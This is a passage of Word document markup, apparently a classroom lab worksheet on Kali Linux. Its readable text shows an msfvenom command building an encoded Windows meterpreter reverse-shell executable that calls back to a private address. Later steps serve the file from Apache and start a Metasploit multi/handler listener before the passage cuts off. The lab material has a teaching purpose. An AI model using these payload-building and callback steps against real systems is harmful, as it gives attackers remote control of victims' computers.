                <v:shape id="Shape 11604" o:spid="_x0000_s1028" style="position:absolute;top:1752;width:54772;height:1753;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="5477256,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8OK8EA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPzWoCMRC+F/oOYQreaqKIyNYotiBqb277AEMy3d12&#10;M1mSqPHtjVDwNh/f7yzX2fXiTCF2njVMxgoEsfG240bD99f2dQEiJmSLvWfScKUI69Xz0xIr6y98&#10;pHOdGlFCOFaooU1pqKSMpiWHcewH4sL9+OAwFRgaaQNeSrjr5VSpuXTYcWlocaCPlsxffXIawm/z&#10;bnze2YW6Tjf+8Gnyto5aj17y5g1Eopwe4n/33pb5k7mawf2dcoN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QvDivBAAAA3gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9kb3du&#10;cmV2LnhtbFBLBQYAAAAABAAEAPUAAACGAwAAAAA=&#10;" path="m,l5477256,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,5477256,175260"/>
                </v:shape>
                <v:shape id="Shape 11605" o:spid="_x0000_s1029" style="position:absolute;top:3505;width:21640;height:1752;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="216408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VOAsYA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPS2vCQBC+C/0PyxR6040Wg0Q3oRSEXIqvltbbNDtN&#10;gtnZNLua+O+7QsHbfHzPWWWDacSFOldbVjCdRCCIC6trLhW8H9bjBQjnkTU2lknBlRxk6cNohYm2&#10;Pe/osvelCCHsElRQed8mUrqiIoNuYlviwP3YzqAPsCul7rAP4aaRsyiKpcGaQ0OFLb1WVJz2Z6Pg&#10;FOdv3x+bZrt4lvnQ28+v7fE3V+rpcXhZgvA0+Lv4353rMH8aR3O4vRNukO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RVOAsYAAADeAAAADwAAAAAAAAAAAAAAAACYAgAAZHJz&#10;L2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIsDAAAAAA==&#10;" path="m,l2164080,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,2164080,175260"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">:/home/kali# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -p windows/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -platform windows -</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> x86 -e x86/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shikata_ga_nai</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> -b "\x00" LHOST=10.0.2.15 -f exe &gt; Desktop/ExploitPriv.exe </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Final size of exe file: 73802 bytes </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="244" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="-15" w:hanging="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>CHECK FILE/FOLDER PERMISSIONS (As we have already set them. If not executable, follow instructions in the task 2 from CHMOD)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:ind w:right="2029"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:/home/kali# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -la /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">/www/html/ | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>grep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> share </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>drwxr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>xr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">-x 2 www-data </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>www-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t>data</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t xml:space="preserve">  4096</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nov 10 16:32 share </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:after="10" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="244" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="-15" w:hanging="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Start Apache and copy the exploit to the shared folder</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>root@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:/home/kali# service apache2 start </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>19203</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="4367784" cy="350520"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="9660" name="Group 9660"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="4367784" cy="350520"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="4367784" cy="350520"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
                        <wps:cNvPr id="11606" name="Shape 11606"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="0"/>
                            <a:ext cx="4367784" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="4367784" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="4367784" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="4367784"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1607" name="Shape 11607"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="0" y="175260"/>
                            <a:ext cx="1524000" cy="175260"/>
                          </a:xfrm>
                          <a:custGeom>
                            <a:avLst/>
                            <a:gdLst/>
                            <a:ahLst/>
                            <a:cxnLst/>
                            <a:rect l="0" t="0" r="0" b="0"/>
                            <a:pathLst>
                              <a:path w="1524000" h="175260">
                                <a:moveTo>
                                  <a:pt x="0" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="1524000" y="0"/>
                                </a:lnTo>
                                <a:lnTo>
                                  <a:pt x="1524000"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g:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:anchor>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="3208785D" id="Group 9660" o:spid="_x0000_s1026" style="position:absolute;margin-left:0;margin-top:1.5pt;width:343.9pt;height:27.6pt;z-index:-251653120" coordsize="43677,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AfCxwIAAM0JAAAOAAAAZHJzL2Uyb0RvYy54bWzsVltv2yAUfp+0/4D8vthOm6SzkvRhXfsy&#10;bVXb/QCK8UXCgIDGyb/f4dgQt5W6qrtoD/ODwXCu3+E7Zn2+7wTZcWNbJTdJPssSwiVTZSvrTfL9&#10;7vLDWUKso7KkQkm+SQ7cJufb9+/WvS74XDVKlNwQMCJt0etN0jinizS1rOEdtTOluYTNSpmOOvg0&#10;dVoa2oP1TqTzLFumvTKlNopxa2H1YthMtmi/qjhz36rKckfEJoHYHL4Nvu/9O92uaVEbqpuWjWHQ&#10;N0TR0VaC02jqgjpKHkz7zFTXMqOsqtyMqS5VVdUyjjlANnn2JJsrox405lIXfa0jTADtE5zebJZ9&#10;3V0b0pab5ONyCQBJ2kGV0DHBFQCo13UBcldG3+prMy7Uw5fPeV+Zzo+QDdkjtIcILd87wmDx9GS5&#10;Wp2dJoTB3skiW8xH7FkDBXqmxprPLyumwW3qo4vB9BqOkT0iZX8NqduGao4FsB6BEak8X2bLABWK&#10;kGEJoUHJCJQtLGD2JpTy1WIOJQGjMVlasAfrrrhCvOnui3WwDaeuDDPahBnbyzA1QIMXCaCp83re&#10;lJ+SflKwBmg9ROK3O7XjdwoF3ZOqQZTHXSGnUrH64WCAbJAIo0Z7U8lHAASxMA7icGLB5KsFA5qD&#10;EQjCZ4v4RgRgcYqxkB4McMModKdKUIc071oHbUu0HTifr7LsaBis+UM4VB1n7iC4B0zIG14B1ZAi&#10;fsGa+v6TMGRHfXPCZ6w2inqRqhUiauXo+pHWJTzR+Sjs9Ti2vqiZDZpsdDj0P+gikFfogpB3VELP&#10;SrqoL6F3Y2iThPz0XpUH7AiYMxDPN4u/xMDVcwaufIw+AODqaxl4PDsAwNhz8sX81NcUm9VRACAK&#10;rW56RP4oDWMov4OG0dhPaTiVfARAoF8Y/9PQk/ffoyH+FuHOgM1tvN/4S8n0G1vV8Ra2/QEAAP//&#10;AwBQSwMEFAAGAAgAAAAhAKiHUDvdAAAABQEAAA8AAABkcnMvZG93bnJldi54bWxMj0FLw0AQhe+C&#10;/2EZwZvdpKU1xExKKeqpCLaCeJsm0yQ0uxuy2yT9944ne3oMb3jve9l6Mq0auPeNswjxLALFtnBl&#10;YyuEr8PbUwLKB7Iltc4ywpU9rPP7u4zS0o32k4d9qJSEWJ8SQh1Cl2rti5oN+Znr2Ip3cr2hIGdf&#10;6bKnUcJNq+dRtNKGGisNNXW8rbk47y8G4X2kcbOIX4fd+bS9/hyWH9+7mBEfH6bNC6jAU/h/hj98&#10;QYdcmI7uYkuvWgQZEhAWImKukmfZcURYJnPQeaZv6fNfAAAA//8DAFBLAQItABQABgAIAAAAIQC2&#10;gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAG&#10;AAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAG&#10;AAgAAAAhAKLkB8LHAgAAzQkAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0A&#10;FAAGAAgAAAAhAKiHUDvdAAAABQEAAA8AAAAAAAAAAAAAAAAAIQUAAGRycy9kb3ducmV2LnhtbFBL&#10;BQYAAAAABAAEAPMAAAArBgAAAAA=&#10;">
                <v:shape id="Shape 11606" o:spid="_x0000_s1027" style="position:absolute;width:43677;height:1752;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="4367784,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RvzMQA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPW2vCMBR+F/YfwhnsbaY6KVtnlOEFymCOVdnzoTlr&#10;is1JSaLWf78MBr6dj+965svBduJMPrSOFUzGGQji2umWGwWH/fbxGUSIyBo7x6TgSgGWi7vRHAvt&#10;LvxF5yo2IoVwKFCBibEvpAy1IYth7HrixP04bzEm6BupPV5SuO3kNMtyabHl1GCwp5Wh+lidrILN&#10;8emzrNaln26kednNPt57/EalHu6Ht1cQkYZ4E/+7S53mT/Ish7930g1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Eb8zEAAAA3gAAAA8AAAAAAAAAAAAAAAAAmAIAAGRycy9k&#10;b3ducmV2LnhtbFBLBQYAAAAABAAEAPUAAACJAwAAAAA=&#10;" path="m,l4367784,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,4367784,175260"/>
                </v:shape>
                <v:shape id="Shape 11607" o:spid="_x0000_s1028" style="position:absolute;top:1752;width:15240;height:1753;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="152400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0dzcMA&#10;AADeAAAADwAAAGRycy9kb3ducmV2LnhtbERPzWoCMRC+C32HMEJvmtiDlq1ZWQXBnorWBxg2082y&#10;m8mSRHfr0zeFQm/z8f3Odje5XtwpxNazhtVSgSCuvWm50XD9PC5eQcSEbLD3TBq+KcKufJptsTB+&#10;5DPdL6kROYRjgRpsSkMhZawtOYxLPxBn7ssHhynD0EgTcMzhrpcvSq2lw5Zzg8WBDpbq7nJzGj7q&#10;oKru/VH1h+vpdrT7MUyPSuvn+VS9gUg0pX/xn/tk8vzVWm3g9518gy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0dzcMAAADeAAAADwAAAAAAAAAAAAAAAACYAgAAZHJzL2Rv&#10;d25yZXYueG1sUEsFBgAAAAAEAAQA9QAAAIgDAAAAAA==&#10;" path="m,l1524000,r,175260l,175260,,e" fillcolor="yellow" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,1524000,175260"/>
                </v:shape>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">:/home/kali# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>cp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> /home/kali/Desktop/ExploitPriv.exe </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>var</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">/www/html/share/ </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="244" w:lineRule="auto"/>
        <w:ind w:left="10" w:right="-15" w:hanging="10"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Set Payload and Exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="4869" w:hanging="10"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root@kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">:/home/kali# </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>msfconsole</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">  msf6</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt; use exploit/multi/handler  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A715A6" w:rsidRDefault="00C416A1">
      <w:pPr>
        <w:spacing w:line="237" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="829" w:hanging="10"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251664384" behindDoc="1" locked="0" layoutInCell="1" allowOverlap="1">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>0</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>-331317</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5433060" cy="876300"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="9661" name="Group 9661"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5433060" cy="876300"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5433060" cy="876300"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <wps:wsp>
